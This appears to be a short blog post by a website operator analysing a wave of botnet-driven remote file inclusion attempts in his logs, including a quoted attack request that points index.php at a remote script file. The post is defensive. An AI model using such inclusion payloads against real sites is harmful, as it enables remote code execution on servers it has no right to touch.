|
I've got the impression that over the last couple of days, the amount of webspam is slightly down, while the number of script kiddie attacks is up sharply. So I had a closer look at our logs. I noticed a whole bunch of the usual inclusion attempts like
/index.php?kunden=http://amyru.h18.ru/images/cs.txt?
Sorry, guys - our index.php doesn't even look for a "kunden" parameter (and even if it did, it wouldn't fall for that old trick).
But what I found more interesting is the referrer that came with these attempts:
http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0
Altavista? Who uses that any more? Well, if you look closer, you'll notice that the actual query is for q=search, i.e. it's a query for the word "search"!? And if you try that in Altavista, you get a list of popular search engines - and a bunch of sponsored links. A script kiddie trying to earn something on the side?
Another thing this (poor) hack attempt shows it that it's pretty much useless these days to block IP addresses. At the time of this writing, I'm counting 3614 such requests in today's logfile, coming from 190 different IP addresses. And those are spread all over the world. Some I've checked at random were coming from Belgium, UK, Florida, The University of Virginia, ...
This is clearly a botnet in action here. The best you can do is to block some IP ranges but trying to block each and every IP address of such a botnet would be a task worthy of Sisyphus. Luckily, we've got other means. Bad Behavior, for example. And nothing beats a few carefully constructed .htaccess rules ...
|